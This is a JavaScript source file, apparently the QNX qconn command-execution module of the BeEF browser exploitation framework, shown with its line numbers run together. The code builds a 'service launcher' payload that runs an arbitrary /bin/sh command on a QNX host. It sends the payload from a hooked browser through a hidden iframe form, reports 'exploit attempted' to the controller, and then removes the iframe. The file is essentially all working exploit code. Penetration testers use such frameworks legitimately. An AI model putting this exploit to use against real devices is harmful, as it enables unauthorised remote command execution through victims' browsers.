Path: blob/master/modules/exploits/qnx_qconn_command_execution/command.js
1154 views
//1// Copyright (c) 2006-2025Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function() {78var rhost = '<%= @rhost %>';9var rport = '<%= @rport %>';10var timeout = '<%= @timeout %>';1112// validate payload13try {14var cmd = '<%= @cmd.gsub(/'/, "\\\'").gsub(/"/, '\\\"') %>';15var payload = '\r\nservice launcher\r\nstart/flags run /bin/sh /bin/sh -c "'+cmd+'"\r\n'16} catch(e) {17beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed payload: '+e.toString());18return;19}2021// validate target details22if (!rport || !rhost) {23beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=malformed remote host or remote port');24return;25}26if (!beef.net.is_valid_port(rport)) {27beef.net.send('<%= @command_url %>', <%= @command_id %>, 'fail=invalid remote port');28return;29}3031// send commands32var qnx_iframe_<%= @command_id %> = beef.dom.createIframeIpecForm(rhost, rport, "/index.html", payload);33beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");3435// clean up36cleanup = function() {37document.body.removeChild(qnx_iframe_<%= @command_id %>);38}39setTimeout("cleanup()", timeout*1000);4041});42434445